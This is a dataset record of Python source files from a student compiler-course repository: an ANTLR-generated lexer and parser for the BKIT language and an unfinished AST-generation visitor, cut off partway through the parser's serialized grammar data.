\"WS\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n ruleNames = [ \"ID\", \"REL_OP\", \"BIN_LOGICAL_OP\", \"ADD_OP\", \"MUL_OP\", \n \"UN_LOGICAL_OP\", \"UN_OP\", \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \n \"DIGIT\", \"LETTER\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n \"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \n \"STRING_CHAR\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \n \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \n \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \n \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \n \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \"STAR_FLOAT\", \n \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \n \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \n \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \n \"LEFT_PAREN\", \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \n \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \n \"ASSIGN\", \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \n \"FLOAT_TO_INT\", \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[26] = self.STRING_LIT_action \n actions[93] = self.ILLEGAL_ESCAPE_action \n actions[94] = self.UNCLOSE_STRING_action \n self._actions = actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + str(ruleIndex))\n\n\n def STRING_LIT_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n y = str(self.text)\n self.text = y[1:-1]\n \n \n\n def ILLEGAL_ESCAPE_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 1:\n\n y = str(self.text)\n self.text = y[1:]\n \n \n\n def UNCLOSE_STRING_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 2:\n\n y = str(self.text)\n self.text = y[1:]\n \n \n\n\n" }, { "alpha_fraction": 0.5858895778656006, "alphanum_fraction": 0.5937773585319519, "avg_line_length": 30.27397346496582, "blob_id": "7a7b4c4f4a69e1f517fb10f47c72df0c885ce03a", "content_id": "308e390be7a39b218ef3157c11c84edab02f452f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2282, "license_type": "no_license", "max_line_length": 97, "num_lines": 73, "path": "/AST/assignment2/src/main/bkit/astgen/ASTGeneration0.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# class ASTGeneration(MPVisitor):\n \n# def visitProgram(self,ctx:MPParser.ProgramContext):\n# if ctx.vardecls():\n# return self.visitVardecls(ctx.vardecls()) + 1 if ctx.vardecls() else 1\n\n# def visitVardecls(self,ctx:MPParser.VardeclsContext):\n# if ctx.vardecl():\n# return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail())\n# else:\n# return 0\n\n# def visitVardecltail(self,ctx:MPParser.VardecltailContext): \n# if ctx.vardecl():\n# return self.visitVarDecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail()) \n# else:\n# return 0\n\n# def visitVardecl(self,ctx:MPParser.VardeclContext): \n# res = self.visitMptype(ctx.mptype()) + self.visitIds(ctx.ids())\n# if res:\n# return res + 1\n# else:\n# return res\n\n# def visitMptype(self,ctx:MPParser.MptypeContext):\n# if ctx.INTTYPE() or ctx.FLOATTYPE():\n# return 1\n# else:\n# return 0\n\n# def visitIds(self,ctx:MPParser.IdsContext):\n# if ctx.ids():\n# return 1 + 1 + self.visitIds(ctx.ids())\n# else:\n# if ctx.ID():\n# return 1\n# else:\n# return 0\n\n\nfrom BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\n\nclass ASTGeneration(BKITVisitor):\n \n def visitProgram(self,ctx:BKITParser.ProgramContext):\n if ctx.vardecls():\n return self.visitVardecls(ctx.vardecls()) + 1 if ctx.vardecls() else 1\n else:\n return 1\n\n def visitVardecls(self,ctx:BKITParser.VardeclsContext):\n if ctx.vardecl():\n return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail())\n else:\n return 0\n\n def visitVardecltail(self,ctx:BKITParser.VardecltailContext): \n return self.\n\n def visitVardecl(self,ctx:BKITParser.VardeclContext):\n return self.visitIds() + self.visitMptype()\n\n def visitMptype(self,ctx:BKITParser.MptypeContext):\n return 1\n\n def visitIds(self,ctx:BKITParser.IdsContext):\n if ctx.ids():\n return 1 + self.visitIds(ctx.Ids())\n else:\n return 0" }, { "alpha_fraction": 0.48767709732055664, "alphanum_fraction": 0.549540102481842, "avg_line_length": 34.34391403198242, "blob_id": "4a805a02022e055ce0b3d749683dd9341496c02b", "content_id": "b89791e7a0fa30c794dee056fca225bd4adfed40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 114705, "license_type": "no_license", "max_line_length": 455, "num_lines": 3245, "path": "/Assignments/assignment4/target/main/bkit/parser/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3M\")\n buf.write(\"\\u01bb\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\\t\\23\")\n buf.write(\"\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\")\n buf.write(\"\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\")\n buf.write(\"\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\\4&\\t\")\n buf.write(\"&\\4\\'\\t\\'\\3\\2\\3\\2\\3\\2\\7\\2R\\n\\2\\f\\2\\16\\2U\\13\\2\\3\\2\\7\\2\")\n buf.write(\"X\\n\\2\\f\\2\\16\\2[\\13\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\5\\4i\\n\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\7\\4p\\n\\4\\f\")\n buf.write(\"\\4\\16\\4s\\13\\4\\3\\4\\7\\4v\\n\\4\\f\\4\\16\\4y\\13\\4\\3\\4\\3\\4\\3\\4\")\n buf.write(\"\\3\\5\\3\\5\\3\\5\\7\\5\\u0081\\n\\5\\f\\5\\16\\5\\u0084\\13\\5\\3\\5\\7\\5\")\n buf.write(\"\\u0087\\n\\5\\f\\5\\16\\5\\u008a\\13\\5\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\")\n buf.write(\"\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\5\")\n buf.write(\"\\6\\u009f\\n\\6\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\7\\7\\u00aa\")\n buf.write(\"\\n\\7\\f\\7\\16\\7\\u00ad\\13\\7\\3\\7\\3\\7\\5\\7\\u00b1\\n\\7\\3\\7\\3\\7\")\n buf.write(\"\\3\\7\\3\\b\\3\\b\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\")\n buf.write(\"\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\3\\13\\3\")\n buf.write(\"\\13\\3\\13\\3\\13\\3\\13\\3\\13\\3\\13\\3\\f\\3\\f\\5\\f\\u00d7\\n\\f\\3\\f\")\n buf.write(\"\\3\\f\\3\\f\\3\\r\\3\\r\\3\\16\\3\\16\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\7\")\n buf.write(\"\\17\\u00e5\\n\\17\\f\\17\\16\\17\\u00e8\\13\\17\\7\\17\\u00ea\\n\\17\")\n buf.write(\"\\f\\17\\16\\17\\u00ed\\13\\17\\3\\17\\3\\17\\3\\20\\3\\20\\5\\20\\u00f3\")\n buf.write(\"\\n\\20\\3\\21\\3\\21\\3\\21\\3\\21\\3\\21\\5\\21\\u00fa\\n\\21\\3\\22\\3\")\n buf.write(\"\\22\\3\\22\\3\\22\\3\\22\\3\\22\\7\\22\\u0102\\n\\22\\f\\22\\16\\22\\u0105\")\n buf.write(\"\\13\\22\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\7\\23\\u010d\\n\\23\\f\")\n buf.write(\"\\23\\16\\23\\u0110\\13\\23\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\7\")\n buf.write(\"\\24\\u0118\\n\\24\\f\\24\\16\\24\\u011b\\13\\24\\3\\25\\3\\25\\3\\25\\5\")\n buf.write(\"\\25\\u0120\\n\\25\\3\\26\\3\\26\\3\\26\\5\\26\\u0125\\n\\26\\3\\27\\3\\27\")\n buf.write(\"\\5\\27\\u0129\\n\\27\\3\\30\\3\\30\\3\\30\\3\\30\\3\\30\\6\\30\\u0130\\n\")\n buf.write(\"\\30\\r\\30\\16\\30\\u0131\\3\\31\\3\\31\\5\\31\\u0136\\n\\31\\3\\32\\3\")\n buf.write(\"\\32\\3\\32\\3\\32\\3\\32\\5\\32\\u013d\\n\\32\\3\\33\\3\\33\\3\\33\\5\\33\")\n buf.write(\"\\u0142\\n\\33\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\7\\34\\u0149\\n\\34\\f\")\n buf.write(\"\\34\\16\\34\\u014c\\13\\34\\7\\34\\u014e\\n\\34\\f\\34\\16\\34\\u0151\")\n buf.write(\"\\13\\34\\3\\34\\3\\34\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\")\n buf.write(\"\\35\\3\\35\\5\\35\\u015e\\n\\35\\3\\36\\3\\36\\3\\36\\3\\36\\3\\37\\3\\37\")\n buf.write(\"\\3 \\3 \\3 \\5 \\u0169\\n \\3 \\3 \\3 \\5 \\u016e\\n \\7 \\u0170\\n\")\n buf.write(\" \\f \\16 \\u0173\\13 \\5 \\u0175\\n \\3 \\3 \\3!\\3!\\5!\\u017b\\n\")\n buf.write(\"!\\3!\\3!\\3!\\5!\\u0180\\n!\\7!\\u0182\\n!\\f!\\16!\\u0185\\13!\\3\")\n buf.write(\"\\\"\\3\\\"\\3\\\"\\3\\\"\\6\\\"\\u018b\\n\\\"\\r\\\"\\16\\\"\\u018c\\3\\\"\\5\\\"\\u0190\")\n buf.write(\"\\n\\\"\\3\\\"\\3\\\"\\3\\\"\\5\\\"\\u0195\\n\\\"\\3#\\3#\\3#\\3#\\6#\\u019b\\n\")\n buf.write(\"#\\r#\\16#\\u019c\\3#\\5#\\u01a0\\n#\\3$\\3$\\3$\\3$\\3$\\6$\\u01a7\")\n buf.write(\"\\n$\\r$\\16$\\u01a8\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\7\")\n buf.write(\"\\'\\u01b6\\n\\'\\f\\'\\16\\'\\u01b9\\13\\'\\3\\'\\2\\5\\\"$&(\\2\\4\\6\\b\")\n buf.write(\"\\n\\f\\16\\20\\22\\24\\26\\30\\32\\34\\36 \\\"$&(*,.\\60\\62\\64\\668\")\n buf.write(\":<>@BDFHJL\\2\\b\\3\\2)\\63\\3\\2\\'(\\3\\2\\35 \\3\\2!%\\3\\2\\37 \\3\")\n buf.write(\"\\2\\4\\7\\2\\u01c6\\2S\\3\\2\\2\\2\\4^\\3\\2\\2\\2\\6b\\3\\2\\2\\2\\b\\u0082\")\n buf.write(\"\\3\\2\\2\\2\\n\\u009e\\3\\2\\2\\2\\f\\u00a0\\3\\2\\2\\2\\16\\u00b5\\3\\2\")\n buf.write(\"\\2\\2\\20\\u00b7\\3\\2\\2\\2\\22\\u00c6\\3\\2\\2\\2\\24\\u00cd\\3\\2\\2\")\n buf.write(\"\\2\\26\\u00d6\\3\\2\\2\\2\\30\\u00db\\3\\2\\2\\2\\32\\u00dd\\3\\2\\2\\2\")\n buf.write(\"\\34\\u00df\\3\\2\\2\\2\\36\\u00f0\\3\\2\\2\\2 \\u00f9\\3\\2\\2\\2\\\"\\u00fb\")\n buf.write(\"\\3\\2\\2\\2$\\u0106\\3\\2\\2\\2&\\u0111\\3\\2\\2\\2(\\u011f\\3\\2\\2\\2\")\n buf.write(\"*\\u0124\\3\\2\\2\\2,\\u0128\\3\\2\\2\\2.\\u012a\\3\\2\\2\\2\\60\\u0135\")\n buf.write(\"\\3\\2\\2\\2\\62\\u013c\\3\\2\\2\\2\\64\\u0141\\3\\2\\2\\2\\66\\u0143\\3\")\n buf.write(\"\\2\\2\\28\\u015d\\3\\2\\2\\2:\\u015f\\3\\2\\2\\2<\\u0163\\3\\2\\2\\2>\\u0165\")\n buf.write(\"\\3\\2\\2\\2@\\u017a\\3\\2\\2\\2B\\u018f\\3\\2\\2\\2D\\u019f\\3\\2\\2\\2\")\n buf.write(\"F\\u01a1\\3\\2\\2\\2H\\u01aa\\3\\2\\2\\2J\\u01ae\\3\\2\\2\\2L\\u01b2\\3\")\n buf.write(\"\\2\\2\\2NO\\5\\4\\3\\2OP\\7<\\2\\2PR\\3\\2\\2\\2QN\\3\\2\\2\\2RU\\3\\2\\2\")\n buf.write(\"\\2SQ\\3\\2\\2\\2ST\\3\\2\\2\\2TY\\3\\2\\2\\2US\\3\\2\\2\\2VX\\5\\6\\4\\2W\")\n buf.write(\"V\\3\\2\\2\\2X[\\3\\2\\2\\2YW\\3\\2\\2\\2YZ\\3\\2\\2\\2Z\\\\\\3\\2\\2\\2[Y\\3\")\n buf.write(\"\\2\\2\\2\\\\]\\7\\2\\2\\3]\\3\\3\\2\\2\\2^_\\7\\30\\2\\2_`\\7:\\2\\2`a\\5@\")\n buf.write(\"!\\2a\\5\\3\\2\\2\\2bc\\7\\23\\2\\2cd\\7:\\2\\2dh\\7\\3\\2\\2ef\\7\\25\\2\")\n buf.write(\"\\2fg\\7:\\2\\2gi\\5L\\'\\2he\\3\\2\\2\\2hi\\3\\2\\2\\2ij\\3\\2\\2\\2jk\\7\")\n buf.write(\"\\b\\2\\2kq\\7:\\2\\2lm\\5\\16\\b\\2mn\\7<\\2\\2np\\3\\2\\2\\2ol\\3\\2\\2\")\n buf.write(\"\\2ps\\3\\2\\2\\2qo\\3\\2\\2\\2qr\\3\\2\\2\\2rw\\3\\2\\2\\2sq\\3\\2\\2\\2t\")\n buf.write(\"v\\5\\n\\6\\2ut\\3\\2\\2\\2vy\\3\\2\\2\\2wu\\3\\2\\2\\2wx\\3\\2\\2\\2xz\\3\")\n buf.write(\"\\2\\2\\2yw\\3\\2\\2\\2z{\\7\\17\\2\\2{|\\7;\\2\\2|\\7\\3\\2\\2\\2}~\\5\\16\")\n buf.write(\"\\b\\2~\\177\\7<\\2\\2\\177\\u0081\\3\\2\\2\\2\\u0080}\\3\\2\\2\\2\\u0081\")\n buf.write(\"\\u0084\\3\\2\\2\\2\\u0082\\u0080\\3\\2\\2\\2\\u0082\\u0083\\3\\2\\2\\2\")\n buf.write(\"\\u0083\\u0088\\3\\2\\2\\2\\u0084\\u0082\\3\\2\\2\\2\\u0085\\u0087\\5\")\n buf.write(\"\\n\\6\\2\\u0086\\u0085\\3\\2\\2\\2\\u0087\\u008a\\3\\2\\2\\2\\u0088\\u0086\")\n buf.write(\"\\3\\2\\2\\2\\u0088\\u0089\\3\\2\\2\\2\\u0089\\t\\3\\2\\2\\2\\u008a\\u0088\")\n buf.write(\"\\3\\2\\2\\2\\u008b\\u009f\\5\\f\\7\\2\\u008c\\u009f\\5\\20\\t\\2\\u008d\")\n buf.write(\"\\u009f\\5\\22\\n\\2\\u008e\\u009f\\5\\24\\13\\2\\u008f\\u0090\\5\\26\")\n buf.write(\"\\f\\2\\u0090\\u0091\\7<\\2\\2\\u0091\\u009f\\3\\2\\2\\2\\u0092\\u0093\")\n buf.write(\"\\5\\30\\r\\2\\u0093\\u0094\\7<\\2\\2\\u0094\\u009f\\3\\2\\2\\2\\u0095\")\n buf.write(\"\\u0096\\5\\32\\16\\2\\u0096\\u0097\\7<\\2\\2\\u0097\\u009f\\3\\2\\2\")\n buf.write(\"\\2\\u0098\\u0099\\5\\34\\17\\2\\u0099\\u009a\\7<\\2\\2\\u009a\\u009f\")\n buf.write(\"\\3\\2\\2\\2\\u009b\\u009c\\5\\36\\20\\2\\u009c\\u009d\\7<\\2\\2\\u009d\")\n buf.write(\"\\u009f\\3\\2\\2\\2\\u009e\\u008b\\3\\2\\2\\2\\u009e\\u008c\\3\\2\\2\\2\")\n buf.write(\"\\u009e\\u008d\\3\\2\\2\\2\\u009e\\u008e\\3\\2\\2\\2\\u009e\\u008f\\3\")\n buf.write(\"\\2\\2\\2\\u009e\\u0092\\3\\2\\2\\2\\u009e\\u0095\\3\\2\\2\\2\\u009e\\u0098\")\n buf.write(\"\\3\\2\\2\\2\\u009e\\u009b\\3\\2\\2\\2\\u009f\\13\\3\\2\\2\\2\\u00a0\\u00a1\")\n buf.write(\"\\7\\24\\2\\2\\u00a1\\u00a2\\5 \\21\\2\\u00a2\\u00a3\\7\\27\\2\\2\\u00a3\")\n buf.write(\"\\u00ab\\5\\b\\5\\2\\u00a4\\u00a5\\7\\r\\2\\2\\u00a5\\u00a6\\5 \\21\\2\")\n buf.write(\"\\u00a6\\u00a7\\7\\27\\2\\2\\u00a7\\u00a8\\5\\b\\5\\2\\u00a8\\u00aa\")\n buf.write(\"\\3\\2\\2\\2\\u00a9\\u00a4\\3\\2\\2\\2\\u00aa\\u00ad\\3\\2\\2\\2\\u00ab\")\n buf.write(\"\\u00a9\\3\\2\\2\\2\\u00ab\\u00ac\\3\\2\\2\\2\\u00ac\\u00b0\\3\\2\\2\\2\")\n buf.write(\"\\u00ad\\u00ab\\3\\2\\2\\2\\u00ae\\u00af\\7\\f\\2\\2\\u00af\\u00b1\\5\")\n buf.write(\"\\b\\5\\2\\u00b0\\u00ae\\3\\2\\2\\2\\u00b0\\u00b1\\3\\2\\2\\2\\u00b1\\u00b2\")\n buf.write(\"\\3\\2\\2\\2\\u00b2\\u00b3\\7\\16\\2\\2\\u00b3\\u00b4\\7;\\2\\2\\u00b4\")\n buf.write(\"\\r\\3\\2\\2\\2\\u00b5\\u00b6\\5\\4\\3\\2\\u00b6\\17\\3\\2\\2\\2\\u00b7\")\n buf.write(\"\\u00b8\\7\\22\\2\\2\\u00b8\\u00b9\\7\\64\\2\\2\\u00b9\\u00ba\\7\\3\\2\")\n buf.write(\"\\2\\u00ba\\u00bb\\7>\\2\\2\\u00bb\\u00bc\\5 \\21\\2\\u00bc\\u00bd\")\n buf.write(\"\\7=\\2\\2\\u00bd\\u00be\\5 \\21\\2\\u00be\\u00bf\\7=\\2\\2\\u00bf\\u00c0\")\n buf.write(\"\\5 \\21\\2\\u00c0\\u00c1\\7\\65\\2\\2\\u00c1\\u00c2\\7\\13\\2\\2\\u00c2\")\n buf.write(\"\\u00c3\\5\\b\\5\\2\\u00c3\\u00c4\\7\\20\\2\\2\\u00c4\\u00c5\\7;\\2\\2\")\n buf.write(\"\\u00c5\\21\\3\\2\\2\\2\\u00c6\\u00c7\\7\\31\\2\\2\\u00c7\\u00c8\\5 \")\n buf.write(\"\\21\\2\\u00c8\\u00c9\\7\\13\\2\\2\\u00c9\\u00ca\\5\\b\\5\\2\\u00ca\\u00cb\")\n buf.write(\"\\7\\21\\2\\2\\u00cb\\u00cc\\7;\\2\\2\\u00cc\\23\\3\\2\\2\\2\\u00cd\\u00ce\")\n buf.write(\"\\7\\13\\2\\2\\u00ce\\u00cf\\5\\b\\5\\2\\u00cf\\u00d0\\7\\31\\2\\2\\u00d0\")\n buf.write(\"\\u00d1\\5 \\21\\2\\u00d1\\u00d2\\7\\34\\2\\2\\u00d2\\u00d3\\7;\\2\\2\")\n buf.write(\"\\u00d3\\25\\3\\2\\2\\2\\u00d4\\u00d7\\5.\\30\\2\\u00d5\\u00d7\\7\\3\")\n buf.write(\"\\2\\2\\u00d6\\u00d4\\3\\2\\2\\2\\u00d6\\u00d5\\3\\2\\2\\2\\u00d7\\u00d8\")\n buf.write(\"\\3\\2\\2\\2\\u00d8\\u00d9\\7>\\2\\2\\u00d9\\u00da\\5 \\21\\2\\u00da\")\n buf.write(\"\\27\\3\\2\\2\\2\\u00db\\u00dc\\7\\t\\2\\2\\u00dc\\31\\3\\2\\2\\2\\u00dd\")\n buf.write(\"\\u00de\\7\\n\\2\\2\\u00de\\33\\3\\2\\2\\2\\u00df\\u00e0\\7\\3\\2\\2\\u00e0\")\n buf.write(\"\\u00eb\\7\\64\\2\\2\\u00e1\\u00e6\\5 \\21\\2\\u00e2\\u00e3\\7=\\2\\2\")\n buf.write(\"\\u00e3\\u00e5\\5 \\21\\2\\u00e4\\u00e2\\3\\2\\2\\2\\u00e5\\u00e8\\3\")\n buf.write(\"\\2\\2\\2\\u00e6\\u00e4\\3\\2\\2\\2\\u00e6\\u00e7\\3\\2\\2\\2\\u00e7\\u00ea\")\n buf.write(\"\\3\\2\\2\\2\\u00e8\\u00e6\\3\\2\\2\\2\\u00e9\\u00e1\\3\\2\\2\\2\\u00ea\")\n buf.write(\"\\u00ed\\3\\2\\2\\2\\u00eb\\u00e9\\3\\2\\2\\2\\u00eb\\u00ec\\3\\2\\2\\2\")\n buf.write(\"\\u00ec\\u00ee\\3\\2\\2\\2\\u00ed\\u00eb\\3\\2\\2\\2\\u00ee\\u00ef\\7\")\n buf.write(\"\\65\\2\\2\\u00ef\\35\\3\\2\\2\\2\\u00f0\\u00f2\\7\\26\\2\\2\\u00f1\\u00f3\")\n buf.write(\"\\5 \\21\\2\\u00f2\\u00f1\\3\\2\\2\\2\\u00f2\\u00f3\\3\\2\\2\\2\\u00f3\")\n buf.write(\"\\37\\3\\2\\2\\2\\u00f4\\u00f5\\5\\\"\\22\\2\\u00f5\\u00f6\\t\\2\\2\\2\\u00f6\")\n buf.write(\"\\u00f7\\5\\\"\\22\\2\\u00f7\\u00fa\\3\\2\\2\\2\\u00f8\\u00fa\\5\\\"\\22\")\n buf.write(\"\\2\\u00f9\\u00f4\\3\\2\\2\\2\\u00f9\\u00f8\\3\\2\\2\\2\\u00fa!\\3\\2\")\n buf.write(\"\\2\\2\\u00fb\\u00fc\\b\\22\\1\\2\\u00fc\\u00fd\\5$\\23\\2\\u00fd\\u0103\")\n buf.write(\"\\3\\2\\2\\2\\u00fe\\u00ff\\f\\4\\2\\2\\u00ff\\u0100\\t\\3\\2\\2\\u0100\")\n buf.write(\"\\u0102\\5$\\23\\2\\u0101\\u00fe\\3\\2\\2\\2\\u0102\\u0105\\3\\2\\2\\2\")\n buf.write(\"\\u0103\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\\2\\2\\2\\u0104#\\3\\2\\2\")\n buf.write(\"\\2\\u0105\\u0103\\3\\2\\2\\2\\u0106\\u0107\\b\\23\\1\\2\\u0107\\u0108\")\n buf.write(\"\\5&\\24\\2\\u0108\\u010e\\3\\2\\2\\2\\u0109\\u010a\\f\\4\\2\\2\\u010a\")\n buf.write(\"\\u010b\\t\\4\\2\\2\\u010b\\u010d\\5&\\24\\2\\u010c\\u0109\\3\\2\\2\\2\")\n buf.write(\"\\u010d\\u0110\\3\\2\\2\\2\\u010e\\u010c\\3\\2\\2\\2\\u010e\\u010f\\3\")\n buf.write(\"\\2\\2\\2\\u010f%\\3\\2\\2\\2\\u0110\\u010e\\3\\2\\2\\2\\u0111\\u0112\")\n buf.write(\"\\b\\24\\1\\2\\u0112\\u0113\\5(\\25\\2\\u0113\\u0119\\3\\2\\2\\2\\u0114\")\n buf.write(\"\\u0115\\f\\4\\2\\2\\u0115\\u0116\\t\\5\\2\\2\\u0116\\u0118\\5(\\25\\2\")\n buf.write(\"\\u0117\\u0114\\3\\2\\2\\2\\u0118\\u011b\\3\\2\\2\\2\\u0119\\u0117\\3\")\n buf.write(\"\\2\\2\\2\\u0119\\u011a\\3\\2\\2\\2\\u011a\\'\\3\\2\\2\\2\\u011b\\u0119\")\n buf.write(\"\\3\\2\\2\\2\\u011c\\u011d\\7&\\2\\2\\u011d\\u0120\\5(\\25\\2\\u011e\")\n buf.write(\"\\u0120\\5*\\26\\2\\u011f\\u011c\\3\\2\\2\\2\\u011f\\u011e\\3\\2\\2\\2\")\n buf.write(\"\\u0120)\\3\\2\\2\\2\\u0121\\u0122\\t\\6\\2\\2\\u0122\\u0125\\5*\\26\")\n buf.write(\"\\2\\u0123\\u0125\\5,\\27\\2\\u0124\\u0121\\3\\2\\2\\2\\u0124\\u0123\")\n buf.write(\"\\3\\2\\2\\2\\u0125+\\3\\2\\2\\2\\u0126\\u0129\\5.\\30\\2\\u0127\\u0129\")\n buf.write(\"\\5\\60\\31\\2\\u0128\\u0126\\3\\2\\2\\2\\u0128\\u0127\\3\\2\\2\\2\\u0129\")\n buf.write(\"-\\3\\2\\2\\2\\u012a\\u012f\\5\\60\\31\\2\\u012b\\u012c\\7\\66\\2\\2\\u012c\")\n buf.write(\"\\u012d\\5 \\21\\2\\u012d\\u012e\\7\\67\\2\\2\\u012e\\u0130\\3\\2\\2\")\n buf.write(\"\\2\\u012f\\u012b\\3\\2\\2\\2\\u0130\\u0131\\3\\2\\2\\2\\u0131\\u012f\")\n buf.write(\"\\3\\2\\2\\2\\u0131\\u0132\\3\\2\\2\\2\\u0132/\\3\\2\\2\\2\\u0133\\u0136\")\n buf.write(\"\\5\\66\\34\\2\\u0134\\u0136\\5\\62\\32\\2\\u0135\\u0133\\3\\2\\2\\2\\u0135\")\n buf.write(\"\\u0134\\3\\2\\2\\2\\u0136\\61\\3\\2\\2\\2\\u0137\\u013d\\5\\64\\33\\2\")\n buf.write(\"\\u0138\\u0139\\7\\64\\2\\2\\u0139\\u013a\\5 \\21\\2\\u013a\\u013b\")\n buf.write(\"\\7\\65\\2\\2\\u013b\\u013d\\3\\2\\2\\2\\u013c\\u0137\\3\\2\\2\\2\\u013c\")\n buf.write(\"\\u0138\\3\\2\\2\\2\\u013d\\63\\3\\2\\2\\2\\u013e\\u0142\\7\\3\\2\\2\\u013f\")\n buf.write(\"\\u0142\\5<\\37\\2\\u0140\\u0142\\5> \\2\\u0141\\u013e\\3\\2\\2\\2\\u0141\")\n buf.write(\"\\u013f\\3\\2\\2\\2\\u0141\\u0140\\3\\2\\2\\2\\u0142\\65\\3\\2\\2\\2\\u0143\")\n buf.write(\"\\u0144\\7\\3\\2\\2\\u0144\\u014f\\7\\64\\2\\2\\u0145\\u014a\\5 \\21\")\n buf.write(\"\\2\\u0146\\u0147\\7=\\2\\2\\u0147\\u0149\\5 \\21\\2\\u0148\\u0146\")\n 